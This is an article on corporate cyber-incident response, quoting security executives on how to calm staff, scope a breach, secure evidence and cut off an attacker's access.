Your company just got hacked. Now what?
According to a top cybercrime expert who specializes in data breaches and incident response, the first step is keeping the CISOs and IT security staff calm. A high impact cyber-attack can be a stressful and disorienting event - even for the most veteran technology and business executive.
Dario Forte was police officer in Italy for 15 years, in various crime enforcement squads, including cybercrime enforcement. He’s now founder and CEO of DF Labs in Crema, Italy, a leader in information security, incident management, e-discovery, litigation support and digital forensics.
“The first step is definitely supporting the customer who is reporting the incident - in order to avoid panic,” says Forte.
Forte has extensive real-world experience as a cybersecurity first responder. He has 15 years experience in the Italian military and financial police, and has worked in the United States with NASA and many federal agencies. In both countries, Forte has managed information security strategies and undertook incident management and digital investigations. He is currently the Italian Chief of Delegation and a Subject Matter Expert and Co-Editor serving the Italian Delegation for ISO Standards on Digital Evidence and Investigations, and Incident Management.
When asked if his experience as a police officer carries over to cyber incident response, Forte says yes. “I’ve spent over 15 years in the police, working in the drug and then organized crime enforcement for 10 years. The first thing they teach you is - Don’t panic. If you cannot keep calm things will only get worse”.
“The CISOs we usually talk with have four priority questions to answer about incident response,” says Forte. He explains:
- What is happening?
- How can I prioritize my response?
- How can I contain the damage?
- Has this occurred elsewhere?
Forte continues “The answers to these questions can be given only by a structured approach, where a well prepared Incident Management Team can orchestrate the investigation and response, sharing the artifacts with their trusted peers in order to reduce the reaction time.”
After the first interaction when he helps to keep level heads, Forte explains the next step. “We ask if they’ve been notified of any information that has been disclosed to unauthorized parties, stolen, deleted or corrupted. That will help us to understand the incident scope, its potential impact and the customer ability to govern it. From a technical standpoint, our team immediately engages a conference call with the technical staff at the customer site. Usually that happens no later than 45 minutes from the first call. This phase is fundamental as it gives us an immediate sense of which information is available for investigation and/or helping the customer to avoid any mistake in evidence handling. The latter is the most common cause of failure in the investigation and in response to the incident.”
Reg Harnish, Founder and CEO at GreyCastle Security
Forte makes a crucial point about the importance of securing the (cyber) crime scene.
Brian Minick, former CISO at a Fortune 500 corporation - GE Aviation and Energy - agrees. “When a client discovers they’ve had a breach, there is often a mistaken assumption that the scope of the breach is fairly static,” says Minick, now CEO at Morphick, a cybersecurity professional services firm in Cincinnati. “In reality, the intrusion usually starts weeks or months before detection, and the intruder likely has broad access to the client's network and can move around it quickly. The Morphick Incident Response Team's first priority with a client is to rapidly identify and disrupt the attacker's access to the client's networks and data to mitigate further losses. Preserving evidence and identifying the perpetrators is important, but the investigation can't begin until the crime scene is secured."
Seems like cybercrime response is a lot like street crime response. Another cyber-expert confirms that thought. Ondrej Krehel, managing director and founder at LIFARS, LLC, a New York City digital forensics and cybersecurity intelligence firm that provides data breach incident response - chimes in on his best practices for first-responder work. “The primary objective is to provide intelligence about the technical skill-set and the motivation of the attacker, along with immediate steps to remediate and protect critical assets.”
Krehel goes on to say “we holistically examine the situation to address the incident. This includes initial damage assessment, initial vector of compromise, indicators of compromise, preservation of forensic artifacts, and further forensic analysis of information collected.”